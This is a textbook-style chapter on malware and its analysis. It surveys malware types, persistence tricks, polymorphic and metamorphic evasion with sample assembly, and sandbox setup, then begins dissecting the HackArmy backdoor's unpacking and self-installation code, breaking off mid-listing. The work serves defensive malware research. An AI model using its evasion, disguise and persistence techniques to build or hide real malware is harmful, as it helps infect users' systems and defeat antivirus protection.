Chapter 8. Reversing Malware

Malicious software (or malware) is any program that works against the interests of the system's user or owner. Generally speaking, computer users expect the computer and all of the software running on it to work on their behalf. Any program that violates this rule is considered malware, because it works in the interest of other people. Sometimes the distinction can get fuzzy. Imagine what happens when a company CEO decides to spy on all company employees. There are numerous programs available that report all kinds of usage statistics and Web-browsing habits. These can be considered malware because they work against the interest of the system's end user and are often extremely difficult to remove.

This chapter introduces the concept of malware and describes the purpose of these programs and how they work. We will be getting into the different types of malware currently in existence, and we'll describe the various techniques they employ in hiding from end users and from antivirus programs.

This topic is related to reversing because reversing is the strongest weapon we, the good people, have against creators of malware. Antivirus researchers routinely engage in reversing sessions in order to analyze the latest malicious programs, determine just how dangerous they are, and learn their weaknesses so that effective antivirus programs can be developed. This chapter opens with a general discussion on some basic malware concepts, and proceeds to demonstrate the malware analysis process on real-world malware.

Types of Malware

Malicious code is so prevalent these days that there is widespread confusion regarding the different types of malware currently in existence. The following sections discuss the most popular types of malicious software and explain the differences between them and the dangers associated with them.

Viruses

Viruses are self-replicating programs that usually have a malicious intent. They are the oldest breed of malware and have become slightly less popular these days, now that there is the Internet. The unique thing about a virus that sets it apart from all other conventional programs is its self-replication. What other program do you know of that actually makes copies of itself whenever it gets the chance? Over the years, there have been many different kinds of viruses, some harmful ones that would delete valuable information or freeze the computer, and others that were harmless and would simply display annoying messages in an attempt to grab the user's attention.

Viruses typically attach themselves to executable program files (such as .exe files on Windows) and slowly duplicate themselves into many executable files on the infected system. As soon as an infected executable is somehow transferred and executed on another machine, that machine becomes infected as well. This means that viruses almost always require some kind of human interaction in order to replicate—they can't just "flow" into the machine next door. Actual viruses are considered pretty rare these days. The Internet is such an attractive replication medium for malicious software that almost every malicious program utilizes it in one way or another. A malicious program that uses the Internet to spread is typically called a worm.

Worms

A worm is fundamentally similar to a virus in the sense that it is a self-replicating malicious program. The difference is that a worm self-replicates using a network (such as the Internet), and the replication process doesn't require direct human interaction. It can take place in the background—the user doesn't even have to touch the computer. As you probably imagine, worms have the (well-proven) potential to spread uncontrollably and in remarkably brief periods of time. In a world where almost every computer system is attached to the same network, worms can very easily search for and infect new systems.

Worms can spread using several different techniques. One method by which a modern worm spreads is taking advantage of certain operating system or application program vulnerabilities that allow it to hide in a seemingly innocent data packet. These are the vulnerabilities we discussed in Chapter 7, which can be utilized by attackers in a variety of ways, but they're most commonly used for developing malicious worms. Another common infection method for modern worms is e-mail. Mass mailing worms typically scan the user's contact list and mail themselves to every contact on such a list. It depends on the specific e-mail program, but in most cases the recipient will have to manually open the infected attachment in order for the worm to spread. Not so with vulnerability-based attacks; these rarely require an end-user operation to penetrate a system.

Trojan Horses

I'm sure you've heard the story about the Trojan horse. The general idea is that a Trojan horse is an innocent artifact openly delivered through the front door when it in fact contains a malicious element hidden somewhere inside of it. In the software world, this translates to seemingly innocent files that actually contain some kind of malicious code underneath. Most Trojans are actually functional programs, so that the user never becomes aware of the problem; the functional element in the program works just fine, while the malicious element works behind the user's back to promote the attacker's interests.

It's really quite easy to go about hiding unwanted functionality inside a useful program. The elegant way is to simply embed a malicious element inside an otherwise benign program. The victim then receives the infected program, launches it, and remains completely oblivious to the fact that the system has been infected. The original application continues to operate normally to eliminate any suspicion.

Another way to implement Trojans that is slightly less elegant (yet quite effective) is by simply fooling users into believing that a file containing a malicious program is really some kind of innocent file, such as a video clip or an image. This is particularly easy under Windows, where file types are determined by their extensions as opposed to actually examining their headers. This means that a remarkably silly trick such as hiding the file's real extension after a couple of hundred spaces actually works. Consider the following file name for example: "A Great Picture.jpg .exe". Depending on the program showing the file name, it might not have room to actually show this whole thing, so it might appear something like "A Great Picture.jpg . . .", essentially hiding the fact that the file is really a program, and not a JPEG picture. One problem with this trick is that Windows will still usually show an application icon, but in some cases Windows will actually show an executable program's icon, if one is available. All one would have to do is simply create an executable that has the default Windows picture icon as its program icon and name it something similar to my example.

Backdoors

A backdoor is a type of malicious software that creates a (usually covert) access channel that the attacker can use for connecting, controlling, spying, or otherwise interacting with the victim's system. Some backdoors come in the form of actual programs that when executed can enable an attacker to remotely connect to the system and use it for a variety of activities. Other backdoors can actually be planted into the program source code right from the beginning by a rogue software developer. If you're thinking that software vendors double-check their source code before the product is shipped, think again. The general rule is that if it works, there's nothing to worry about. Even if the code was manually checked, it is possible to bury a backdoor deep within the source code, in a way that would require an extremely keen eye to notice. It is precisely these types of problems that make open-source software so attractive—these things rarely happen in open-source products.

Mobile Code

Mobile code is a class of benign programs that are specifically meant to be mobile and be executed on a large number of systems without being explicitly installed by end users. Most of today's mobile programs are designed to create a more active Web-browsing experience. This includes all kinds of interactive Java applets and ActiveX controls that allow Web sites to embed highly responsive animated content, 3-D presentations, and so on. Depending on the specific platform, these programs essentially enable Web sites to quickly download and launch a program on the end user's system. In most cases (but not all), the user receives a confirmation message saying a program is about to be installed and launched locally. Still, as mentioned earlier, many users seem to "automatically" click the confirmation button, without even considering the possibility that potentially malicious code is about to be downloaded into their system.

The term mobile code only determines how the code is distributed and not the technical details of how it is executed. Certain types of mobile code, such as Java scripts, are distributed in source code form, which makes them far easier to dissect. Others, such as ActiveX components, are conventional PE executables that contain native IA-32 machine code—these are probably the most difficult to analyze. Finally, some mobile code components, such as Java applets, are presented in bytecode form, which makes them highly vulnerable to decompilation and reverse engineering.

Adware/Spyware

This is a relatively new category of malicious programs that has become extremely popular. There are several different types of programs that are part of this category, but probably the most popular ones are the Adware-type programs. Adware is programs that force unsolicited advertising on end users. The idea is that the program gathers various statistics regarding the end user's browsing and shopping habits (sometimes transmitting that data to a centralized server) and uses that information to display targeted ads to the end user. Adware is distributed in many ways, but the primary distribution method is to bundle the adware with free software. The free software is essentially funded by the advertisements displayed by the adware program.

There are several problems with these programs that effectively turn them into a major annoyance that can completely ruin the end-user experience on an infected system. First of all, in some programs the advertisements can appear out of nowhere, regardless of what the end user is doing. This can be highly distracting and annoying. Second, the way in which these programs interface with the operating system and with the Web browser is usually so aggressive and poorly implemented that many of these programs end up reducing the performance and robustness of the system. In Internet Explorer for example, it is not uncommon to see the browser on infected systems freeze for a long time just because a spyware DLL is poorly implemented and doesn't properly use multithreaded code. The interesting thing is that this is not intentional—the adware/spyware developers are simply careless, and they tend to produce buggy code.

Sticky Software

Some malicious programs, and especially spyware/adware programs that have a high user visibility invest a lot of energy into preventing users from manually uninstalling them. One simple way to go about doing this is to simply not offer an uninstall program, but that's just the tip of the iceberg. Some programs go to great lengths to ensure that no one, especially no user (as opposed to a program that is specifically crafted for this purpose) can remove them.

Here is an example on how this is possible under Windows. It is possible to install registry keys that instruct Windows to always launch the malware as soon as the system is started. The program can constantly monitor those keys while it is running to make sure those keys are never deleted. If they are, the program can immediately reinstate them. The way to fight this trick from the user's perspective would be to try and terminate the program and then delete the keys. In such case, the malware can use two separate processes, each monitoring the other. When one is terminated, the other immediately launches it again. This makes it quite difficult to get both of them to go away. Because both executables are always running, it becomes very difficult to remove the executable files from the hard drive (because they are locked by the operating system).

Scattering copies of the malware engine throughout various components in the system such as Web browser add-ons, and the like is another approach. Each of these components constantly ensures that none of the others have been removed. If it has been, the damaged component is reinstalled immediately.

Future Malware

Many people have said so the following, and it is becoming quite obvious: Today's malware is just the tip of the iceberg; it could be made far more destructive. In the future, malicious programs could take over computer systems at such low levels that it would be difficult to create any kind of antidote software simply because the malware would own the platform and would be able to control the antivirus program itself. Additionally, the concept of information-stealing worms could some day become a reality, allowing malware developers to steal their victim's valuable information and hold it for ransom!

The following sections discuss some futuristic malware concepts and attempt to assess their destructive potential.

Information-Stealing Worms

Cryptography is a wonderful thing, but in some cases it can be utilized to perpetrate malicious deeds. Present-day malware doesn't really use cryptography all that much, but this could easily change. Asymmetric encryption creates new possibilities for the creation of information-stealing worms [Young]. These are programs that could potentially spread like any other worm, except that they would locate valuable data on an infected system (such as documents, databases, and so on) and steal it. The actual theft would be performed by encrypting the data using an asymmetric cipher; asymmetric ciphers are encryption algorithms that use a pair of keys. One key (the public key) is used for encrypting the data and another (the private key) is used for decrypting the data. It is not possible to obtain one key from the other.

An information-stealing (or kleptographic) worm could simply embed an encryption key inside its body, and start encrypting every bit of data that appears to be valuable (certain file types that typically contain user data, and so on). By the time the end user realized what had happened, it would already be too late. There could be extremely valuable information sitting on the infected system that's as good as gone. Decryption of the data would not be possible—only the attacker would have the decryption key. This would open the door to a brand-new level of malicious software attacks: attackers could actually blackmail their victims.

Needless to say, actually implementing this idea is quite complicated. Probably the biggest challenge (from an attacker's perspective) would be to demand the ransom and successfully exchange the key for the ransom while maintaining full anonymity. Several theoretical approaches to these problems are discussed in [Young], including zero-knowledge proofs that could be used to allow an attacker to prove that he or she is in possession of the decryption key without actually exposing it.

BIOS/Firmware Malware

The basic premise of most malware defense strategies is to leverage the fact that there is always some kind of trusted element in the system. After all, how can an antivirus program detect malicious program if it can't trust the underlying system? For instance, consider an antivirus program that scans the hard drive for infected files and simply uses high-level file-system services in order to read files from the hard drive and determine whether they are infected or not. A clever malicious program could relatively easily install itself as a file-system filter that would intercept the antivirus program's file system calls and present it with fake versions of the files on disk (these would usually be the original, uninfected versions of those files). It would simply hide the fact that it has infected numerous files on the hard drive from the antivirus program!

That is why most security and antivirus programs enter deep into the operating system kernel; they must reside at a low enough level so that malicious programs can't distort their view of the system by implementing file-system filtering or a similar approach.

Here is where things could get nasty. What would happen if a malicious program altered an extremely low-level component? This would be problematic because the antivirus programs would be running on top of this infected component and would have no way of knowing whether they are seeing an authentic picture of the system, or an artificial one painted by a malicious program that doesn't want to be found. Let's take a quick look at how this could be possible.

The lowest level at which a malicious program could theoretically infect a program is the CPU or other hardware devices that use upgradeable firmware. Most modern CPUs actually run a very low-level code that implements each and every supported assembly language instruction using low-level instruction called micro-ops (μ-ops). The μ-op code that runs inside the processor is called firmware, and can usually be updated at the customer site using a special firmware-updating program. This is a sensible design decision since it enables software-level bug fixes that would otherwise require physically replacing the processor. The same goes for many hardware devices such as network and storage adapters. They are often based on programmable microcontrollers that support user-upgradeable firmware.

It is not exactly clear what a malicious program could do at the firmware level, if anything, but the prospects are quite chilling. Malicious firmware would theoretically be included as a part of a larger malicious program and could be used to hide the existence of the malicious program from security and antivirus programs. It would compromise the integrity of the only trustworthy component in a computer system: the hardware. In reality, it would not be easy to implement this kind of attack. The contents of firmware update files made for Intel processors appear to be encrypted (with the decryption key hidden safely inside the processor), and their exact contents are not known. For more information on this topic see Malware: Fighting Malicious Code by Ed Skoudis and Lenny Zeltser [Skoudis].

Uses of Malware

There are different types of motives that drive people to develop malicious programs. Some developers are interest-driven: The developer actually gains some kind of financial reward by spreading the programs. Others are motivated by certain psychological urges or by childish desires to beat the system. It is hard to classify malware in this way by just looking at what it does. For example, when you run into a malicious program that provides backdoor access to files on infected machines, you might never know whether the program was developed for stealing valuable corporate data or to allow the attacker to peep into some individual's personal files.

Let's take a look at the most typical purposes of malicious programs and try to discover what motivates people to develop them.

Backdoor Access This is a popular end goal for many malicious programs. The attacker gets unlimited access to the infected machine and can use it for a variety of purposes.
Denial-of-Service (DoS) Attacks These attacks are aimed at damaging a public server hosting a Web site or other publicly available resource. The attack is performed by simply programming all infected machines (which can be a huge number of systems) to try to connect to the target resource at the exact same time and simply keep on trying. In many cases, this causes the target server to become unavailable, either due to its Internet connection being saturated, or due to its own resources being exhausted. In these cases, there is typically no direct benefit to the attacker, except perhaps revenge. One direct benefit could occur if the owner of the server under attack were a direct business competitor of the attacker.
Vandalism Sometimes people do things for pure vandalism. An attacker might gain satisfaction and self-importance from deleting a victim's precious files or causing other types of damage. People have a natural urge to make an impact on the world, and unfortunately some people don't care whether it's a negative or a positive impact.
Resource Theft A malicious program can be used to steal other people's computing and networking resources. Once an attacker has a carefully crafted malicious program running on many systems, he or she can start utilizing these systems for extra computing power or extra network bandwidth.
Information Theft Finally, malicious programs can easily be used for information theft. Once a malicious program penetrates into a host, it becomes exceedingly easy to steal files and personal information from that system. If you are wondering where a malicious program would send such valuable information without immediately exposing the attacker, the answer is that it would usually send it to another infected machine, from which the attacker could retrieve it without leaving any trace.

Malware Vulnerability

Malware suffers from the same basic problem as copy protection technologies—they run on untrusted platforms and are therefore vulnerable to reversing. The logic and functionality that resides in a malicious program are essentially exposed for all to see. No encryption-based approach can address this problem because it is always going to have to remain possible for the system's CPU to decrypt and access any code or data in the program. Once the code is decrypted, it is going to be possible for malware researchers to analyze its code and behavior—there is no easy way to get around this problem.

There are many ways to hide malicious software, some aimed at hiding it from end users, while others aim at hindering the process of reversing the program so that it survives longer in the wild. Hiding the program can be as simple as naming it in a way that would make end users think it is benign, or even embedding it in some operating system component, so that it becomes completely invisible to the end user.

Once the existence of a malicious program is detected, malware researchers are going to start analyzing and dissecting it. Most of this work revolves around conventional code reversing, but it also frequently relies on system tools such as network- and file-monitoring programs that expose the program's activities without forcing researchers to inspect the code manually. Still, the most powerful analysis method remains code-level analysis, and malware authors sometimes attempt to hinder this process by use of antireversing techniques. These are techniques that attempt to scramble and complicate the code in ways that prolong the analysis process. It is important to keep in mind that most of the techniques in this realm are quite limited and can only strive to complicate the process somewhat, but never to actually prevent it. Chapter 10 discusses these antireversing techniques in detail.

Polymorphism

The easiest way for antivirus programs to identify malicious programs is by using unique signatures. The antivirus program maintains a frequently updated database of virus signatures, which aims to contain a unique identification for every known malware program. This identification is based on a unique sequence that was found in a particular strand of the malicious program.

Polymorphism is a technique that thwarts signature-based identification programs by randomly encoding or encrypting the program code in a way that maintains its original functionality. The simplest approach to polymorphism is based on encrypting the program using a random key and decrypting it at runtime. Depending on when an antivirus program scans the program for its signature, this might prevent accurate identification of a malicious program because each copy of it is entirely different (because it is encrypted using a random encryption key).

There are two significant weaknesses with these kinds of solutions. First of all, many antivirus programs might scan for virus signatures in memory. Because in most cases the program is going to be present in memory in its original, unencrypted form, the antivirus program won't have a problem matching the running program with the signature it has on file. The second weakness lies in the decryption code itself. Even if an antivirus program only uses on-disk files in order to match malware signatures, there is still the problem of the decryption code being static. For the program to actually be able to run, it must decrypt itself in memory, and it is this decryption code that could theoretically be used as the signature.

The solution to these problems generally revolves around rotating or scrambling certain elements in the decryption code (or in the entire program) in ways that alter its signature yet preserve its original functionality. Consider the following sequence as an example:

0040343B    8B45 CC        MOV EAX,[EBP-34]
0040343E    8B00           MOV EAX,[EAX]
00403440    3345 D8        XOR EAX,[EBP-28]
00403443    8B4D CC        MOV ECX,[EBP-34]
00403446    8901           MOV [ECX],EAX
00403448    8B45 D4        MOV EAX,[EBP-2C]
0040344B    8945 D8        MOV [EBP-28],EAX
0040344E    8B45 DC        MOV EAX,[EBP-24]
00403451    3345 D4        XOR EAX,[EBP-2C]
00403454    8945 DC        MOV [EBP-24],EAX

One almost trivial method that would make it a bit more difficult to identify this sequence would consist of simply randomizing the use of registers in the code. The code sequence uses registers separately at several different phases. Consider, for example, the instructions at 00403448 and 0040344E. Both instructions load a value into EAX, which is used in instructions that follow. It would be quite easy to modify these instructions so that the first uses one register and the second uses another register. It is even quite easy to change the base stack frame pointer (EBP) to use another general-purpose register.

Of course, you could change way more than just registers (see the following section on metamorphism), but by restricting the magnitude of the modification to something like register usage you're enabling the creation of fairly trivial routines that would simply know in advance which bytes should be modified in order to alter register usage—it would all be hard-coded, and the specific registers would be selected randomly at runtime.

0040343B     8B57 CC        MOV EDX,[EDI-34]
0040343E     8B02           MOV EAX,[EDX]
00403440     3347 D8        XOR EAX,[EDI-28]
00403443     8B5F CC        MOV EBX,[EDI-34]
00403446     8903           MOV [EBX],EAX
00403448     8B77 D4        MOV ESI,[EDI-2C]
0040344B     8977 D8        MOV [EDI-28],ESI
0040344E     8B4F DC        MOV ECX,[EDI-24]
00403451     334F D4        XOR ECX,[EDI-2C]
00403454     894F DC        MOV [EDI-24],ECX

This code provides an equivalent-functionality alternative to the original sequence. The emphasized bytecodes represent the bytecodes that have changed from the original representation. To simplify the implementation of such transformation, it is feasible to simply store a list of predefined bytes that could be altered and in what way they can be altered. The program could then randomly fiddle with the available combinations during the self-replication process and generate a unique machine code sequence. Because this kind of implementation requires the creation of a table of hard-coded information regarding the specific code bytes that can be altered, this approach would only be feasible when most of the program is encrypted or encoded in some way, as described earlier. It would not be practical to manually scramble an entire program in this fashion. Additionally, it goes without saying that all registers must be saved and restored before entering a function that can be polymorphed in this fashion.

Metamorphism

Because polymorphism is limited to very superficial modifications on the malware's decryption code, there are still plenty of ways for antivirus programs to identify polymorphed code by analyzing the code and extracting certain high-level information from it.

This is where metamorphism enters into the picture. Metamorphism is the next logical step after polymorphism. Instead of encrypting the program's body and making slight alterations in the decryption engine, it is possible to alter the entire program each time it is replicated. The benefit of metamorphism (from a malware writer's perspective) is that each version of the malware can look radically different from any other versions. This makes it very difficult (if not impossible) for antivirus writers to use any kind of signature-matching techniques for identifying the malicious program.

Metamorphism requires a powerful code analysis engine that actually needs to be embedded into the malicious program. This engine scans the program code and regenerates a different version of it on the fly every time the program is duplicated. The clever part here is the type of changes made to the program. A metamorphic engine can perform a wide variety of alterations on the malicious program (needless to say, the alterations are performed on the entire malicious program, including the metamorphic engine itself). Let's take a look at some of the alterations that can be automatically applied to a program by a metamorphic engine.

Instruction and Register Selection Metamorphic engines can actually analyze the malicious program in its entirety and regenerate the code for the entire program. While reemitting the code the metamorphic engine can randomize a variety of parameters regarding the code, including the specific selection of instructions (there is usually more than one instruction that can be used for performing any single operation), and the selection of registers.
Instruction Ordering Metamorphic engines can sometimes randomly alter the order of instructions within a function, as long as the instructions in question are independent of one another.
Reversing Conditions In order to seriously alter the malware code, a metamorphic engine can actually reverse some of the conditional statements used in the program. Reversing a condition means (for example) that instead of using a statement that checks whether two operands are equal, you check whether they are unequal (this is routinely done by compilers in the compilation process; see Appendix A). This results in a significant rearrangement of the program's code because it forces the metamorphic engine to relocate conditional blocks within a single function. The idea is that even if the antivirus program employs some kind of high-level scanning of the program in anticipation of a metamorphic engine, it would still have a hard time identifying the program.
Garbage Insertion It is possible to randomly insert garbage instructions that manipulate irrelevant data throughout the program in order to further confuse antivirus scanners. This also adds a certain amount of confusion for human reversers that attempt to analyze the metamorphic program.
Function Order The order in which functions are stored in the module matters very little to the program at runtime, and randomizing it can make the program somewhat more difficult to identify.

To summarize, by combining all of the previously mentioned techniques (and possibly a few others), metamorphic engines can create some truly flexible malware that can be very difficult to locate and identify.

Establishing a Secure Environment

The remainder of this chapter is dedicated to describe a reversing session of an actual malicious program. I've intentionally made the discussion quite detailed, so that readers who aren't properly set up to try this at home won't have to. I would only recommend that you try this out if you can allocate a dedicated machine that is not connected to any network, either local or the Internet. It is also possible to use a virtual machine product such as Microsoft Virtual PC or VMWare Workstation, but you must make sure the virtual machine is completely detached from the host and from the Internet. If your virtual machine is connected to a network, make sure that network is connected to neither the Internet nor the host.

If you need to transfer any executables (such as the malicious program itself) from your primary system into the test system you should use a recordable CD or DVD, just to make sure the malicious program can't replicate itself into that disc and infect other systems. Also, when you store the malicious program on your hard drive or on a recordable CD, it might be wise to rename it with a nonexecutable extension, so that it doesn't get accidentally launched.

The HackArmy backdoor dissected in the following pages can be downloaded at this book's Web site at www.wiley.com/eeilam.

The HackArmy Backdoor

The HackArmy Trojan/Backdoor is the program I've chosen as our malware case study. It is relatively simple malware that is reasonably easy to reverse, and most importantly, it lacks any automated self-replication mechanisms. This is important because it means that there is no risk of this program spreading further because of your attempts to study it. Keep in mind that this is no reason to skimp on the security measures I discussed in the previous section. This is still a malicious program, and as such it should be treated with respect.

The program is essentially a Trojan because it is frequently distributed as an innocent picture file. The file is called a variety of names. My particular copy was named Webcam Shots.scr. The SCR extension is reserved for screen savers, but screensavers are really just regular programs; you could theoretically create a word processor with an .scr extension—it would work just fine. The reason this little trick is effective is that some programs (such as e-mail clients) stupidly give these files a little bitmap icon instead of an application icon, so the user might actually think that they're pictures, when in fact they are programs. One trivial solution is to simply display a special alert that notifies the user when an executable is being downloaded via Web or e-mail. The specific file name that is used for distributing this file really varies. In some e-mail messages (typically sent to news groups) the program is disguised as a picture of soccer star David Beckham, while other messages claim that the file contains proof that Nick Berg, an American civilian who was murdered in Iraq in May of 2004, is still alive. In all messages, the purpose of both the message and the file name is to persuade the unsuspecting user to open the attachment and activate the backdoor.

Unpacking the Executable

As with every executable, you begin by dumping the basic headers and imports/export entries in it. You do this by running it through DUMPBIN or a similar program. The output from DUMPBIN is shown in Listing 8.1.

Example 8.1. An abridged DUMPBIN output for the HackArmy backdoor.

Microsoft (R) COFF/PE Dumper Version 7.10.3077
Copyright (C) Microsoft Corporation. All rights reserved.

Dump of file Webcam Shots.scr

File Type: EXECUTABLE IMAGE

   Section contains the following imports:

     KERNEL32.DLL

                    0 LoadLibraryA
                    0 GetProcAddress
                    0 ExitProcess

     ADVAPI32.DLL
                    0 RegCloseKey

     CRTDLL.DLL
                    0 atoi

     SHELL32.DLL

0 ShellExecuteA

     USER32.DLL
                    0 CharUpperBuffA

     WININET.DLL
                    0 InternetOpenA

     WS2_32.DLL
                    0 bind
   Summary

         3000 .rsrc
         9000 UPX0
         2000 UPX1

This output exhibits several unusual properties regarding the executable. First of all, there are quite a few DLLs that only have a single import entry—that is highly irregular and really makes no sense. What would the program be able to do with the Winsock 2 binary WS2_32.DLL if it only called the bind API? Not much. The same goes for CRTDLL.DLL, ADVAPI32.DLL, and the rest of the DLLs listed in the import table. The revealing detail here is the Summary section near the end of the listing. One would expect a section called .text that would contain the program code, but there is no such section. Instead there is the traditional .rsrc resource section, and two unrecognized sections called UPX0 and UPX1.

A quick online search reveals that UPX is an open-source executable packer. An executable packer is a program that compresses or encrypts an executable program in place, meaning that the transformation is transparent to the end user—the program is automatically restored to its original state in memory as soon as it is launched. Some packers are designed as antireversing tools that encrypt the program and try to fend off debuggers and disassemblers. Others simply compress the program for the purpose of decreasing the binary file size. UPX belongs to the second group, and is not designed as an antireversing tool, but simply as a compression tool. It makes sense for this type of Trojan/Backdoor to employ UPX in order to keep its file size as small as possible.

You can verify this assumption by downloading the latest beta version of UPX for Windows (note that the Backdoor uses the latest UPX beta, and that the most recent public release at the time of writing, version 1.25, could not identify the file). You can run UPX on the Backdoor executable with the –l switch so that UPX displays compression information for the Backdoor file.

Ultimate Packer for eXecutables
     Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004
UPX 1.92 beta    Markus F.X.J. Oberhumer & Laszlo Molnar   Jul 20th 2004
         File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     27680 ->  18976   68.55%    win32/pe     Webcam Shots.scr

As expected, the Backdoor is packed with UPX, and is actually about 9 KB lighter because of it. Even though UPX is not designed for this, it is going to be slightly annoying to reverse this program in its compressed form, so you can simply avoid this problem by asking UPX to permanently decompress it; you'll reverse the decompressed file. This is done by running UPX again, this time with the –d switch, which replaces the compressed file with a decompressed version that is functionally identical to the compressed version. At this point, it would be wise to rerun DUMPBIN and see if you get a better result this time. Listing 8.2 contains the DUMPBIN output for the decompressed version.

Example 8.2. DUMPBIN output for the decompressed version of the Backdoor program.

Dump of file Webcam Shots.scr

  Section contains the following imports:

    KERNEL32.DLL
                    0 DeleteFileA
                    0 ExitProcess
                    0 ExpandEnvironmentStringsA
                    0 FreeLibrary
                    0 GetCommandLineA
                    0 GetLastError
                    0 GetModuleFileNameA
                    0 GetModuleHandleA
                    0 GetProcAddress
                    0 GetSystemDirectoryA
                    0 CloseHandle
                    0 GetTempPathA
                    0 GetTickCount
                    0 GetVersionExA
                    0 LoadLibraryA
                    0 CopyFileA
                    0 OpenProcess
                    0 ReleaseMutex
                    0 RtlUnwind
                    0 CreateFileA
                    0 Sleep
                    0 TerminateProcess
                    0 TerminateThread

0 WriteFile
                    0 CreateMutexA
                    0 CreateThread

     ADVAPI32.DLL
                    0 GetUserNameA
                    0 RegDeleteValueA
                    0 RegCreateKeyExA
                    0 RegCloseKey
                    0 RegQueryValueExA
                    0 RegSetValueExA

     CRTDLL.DLL
                    0 __GetMainArgs
                    0 atoi
                    0 exit
                    0 free
                    0 malloc
                    0 memset
                    0 printf
                    0 raise
                    0 rand
                    0 signal
                    0 sprintf
                    0 srand
                    0 strcat
                    0 strchr
                    0 strcmp
                    0 strncpy
                    0 strstr
                    0 strtok

     SHELL32.DLL
                    0 ShellExecuteA

     USER32.DLL
                    0 CharUpperBuffA

    WININET.DLL
                    0 InternetCloseHandle
                    0 InternetGetConnectedState
                    0 InternetOpenA
                    0 InternetOpenUrlA
                    0 InternetReadFile

     WS2_32.DLL
                    0 WSACleanup
                    0 listen
                    0 ioctlsocket

0 inet_addr
                    0 htons
                    0 getsockname
                    0 socket
                    0 gethostbyname
                    0 gethostbyaddr
                    0 connect
                    0 closesocket
                    0 bind
                    0 accept
                    0 __WSAFDIsSet
                    0 WSAStartup
                    0 send
                    0 select
                    0 recv

   Summary

         1000 .bss
         1000 .data
         1000 .idata
         3000 .rsrc
         3000 .text

That's more like it, now you can see exactly which functions are used by the program, and reversing it is going to be a more straightforward task. Keep in mind that in some cases automatically unpacking the program is not going to be possible, and we would have to confront the packed program. This subject is discussed in depth in Part III of this book. For now let's start by running the program and trying to determine what it does. Needless to say, this should only be done in a controlled environment, on an isolated system that doesn't contain any valuable data or programs. There's no telling what this program is liable to do.

Initial Impressions

When launching the Webcam Shots.scr file, the first thing you'll notice is that nothing happens. That's the way it should be—this program does not want to present itself to the end user in any way. It was made to be invisible. If the program's authors wanted the program to be even more convincing and effective, they could have embedded an actual image file into this executable, and immediately extract and show it when the program is first launched. This way the user would never suspect that anything was wrong because the image would be properly displayed. By not doing anything when the user clicks on this file the program might be exposing itself, but then again the typical victims of these kinds of programs are usually nontechnical users that aren't sure exactly what to expect from the computer at any given moment in time. They'd probably think that the reason the image didn't appear was their own fault.

The first actual change that takes place after the program is launched is that the original executable is gone from the directory where it was launched! The task list in Task Manager (or any other process list viewer) seems to contain a new and unidentified process called ZoneLockup.exe. (The machine I was running this on was a freshly installed, clean Windows 2000 system with almost no additional programs installed, so it was easy to detect the newly created process.) The file's name is clearly designed to fool naïve users into thinking that this process is some kind of a security component.

If we launch a more powerful process viewer such as the Sysinternals Process Explorer (available from www.sysinternals.com), you can examine the full path of the ZoneLockup.exe process. It looks like the program has placed itself in the SYSTEM32 directory of the currently running OS (in my case this was C:\WINNT\SYSTEM32).

The Initial Installation

Let's take a quick look at the code that executes when we initially run this program, because it is the closest thing this program has to an installation program. This code is presented in Listing 8.3.

Example 8.3. The backdoor program's installation function.

00402621  PUSH EBP
00402622  MOV EBP,ESP
00402624  SUB ESP,42C
0040262A  PUSH EBX
0040262B  PUSH ESI
0040262C  PUSH EDI
0040262D  XOR ESI,ESI
0040262F  PUSH 104                     ; BufSize = 104 (260.)
00402634  PUSH ZoneLock.00404540       ; PathBuffer = ZoneLock.00404540
00402639  PUSH 0                       ; hModule = NULL
0040263B  CALL <JMP.&KERNEL32.GetModuleFileNameA>
00402640  PUSH 104                     ; BufSize = 104 (260.)
00402645  PUSH ZoneLock.00404010       ; Buffer = ZoneLock.00404010
0040264A  CALL <JMP.&KERNEL32.GetSystemDirectoryA>
0040264F  PUSH ZoneLock.00405544       ; src = "\"
00402654  PUSH ZoneLock.00404010       ; dest = "C:\WINNT\system32"
00402659  CALL <JMP.&CRTDLL.strcat>
0040265E  ADD ESP,8
00402661  LEA ECX,DWORD PTR DS:[404540]
00402667  OR EAX,FFFFFFFF

0040266A  INC EAX
0040266B  CMP BYTE PTR DS:[ECX+EAX],0
0040266F  JNZ SHORT ZoneLock.0040266A
00402671  MOV EBX,EAX
00402673  PUSH EBX                     ; Count
00402674  PUSH ZoneLock.00404540       ; String = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
00402679  CALL <JMP.&USER32.CharUpperBuffA>
0040267E  LEA ECX,DWORD PTR DS:[404010]
00402684  OR EAX,FFFFFFFF
00402687  INC EAX
00402688  CMP BYTE PTR DS:[ECX+EAX],0
0040268C  JNZ SHORT ZoneLock.00402687
0040268E  MOV EBX,EAX
00402690  PUSH EBX                     ; Count
00402691  PUSH ZoneLock.00404010       ; String = "C:\WINNT\system32"
00402696  CALL <JMP.&USER32.CharUpperBuffA>
0040269B  PUSH 0
0040269D  CALL ZoneLock.004019CB
004026A2  ADD ESP,4
004026A5  PUSH ZoneLock.00404010       ; s2 = "C:\WINNT\system32"
004026AA  PUSH ZoneLock.00404540       ; s1 = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026AF  CALL <JMP.&CRTDLL.strstr>
004026B4  ADD ESP,8
004026B7  CMP EAX,0
004026BA  JNZ SHORT ZoneLock.00402736
004026BC  PUSH ZoneLock.00405094       ; src = "ZoneLockup.exe"
004026C1  PUSH ZoneLock.00404010       ; dest = "C:\WINNT\system32"
004026C6  CALL <JMP.&CRTDLL.strcat>
004026CB  ADD ESP,8
004026CE  MOV EDI,0
004026D3  JMP SHORT ZoneLock.004026E0
004026D5  PUSH 1F4                     ; Timeout = 500. ms
004026DA  CALL <JMP.&KERNEL32.Sleep>
004026DF  INC EDI
004026E0  PUSH 0                       ; FailIfExists = FALSE
004026E2  PUSH ZoneLock.00404010       ; NewFileName = "C:\WINNT\system32"004026E7  PUSH ZoneLock.00404540       ; ExistingFileName = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026EC  CALL <JMP.&KERNEL32.CopyFileA>
004026F1  OR EAX,EAX
004026F3  JNZ SHORT ZoneLock.004026FA
004026F5  CMP EDI,5
004026F8  JL SHORT ZoneLock.004026D5
004026FA  PUSH ZoneLock.00404540       ; <%s> =  "C:\WINNT\SYSTEM32\ZoneLockup.exe"

004026FF  PUSH ZoneLock.0040553D       ; format = "qwer%s"
00402704  LEA EAX,DWORD PTR SS:[EBP-29C]
0040270A  PUSH EAX                     ; s
0040270B  CALL <JMP.&CRTDLL.sprintf>
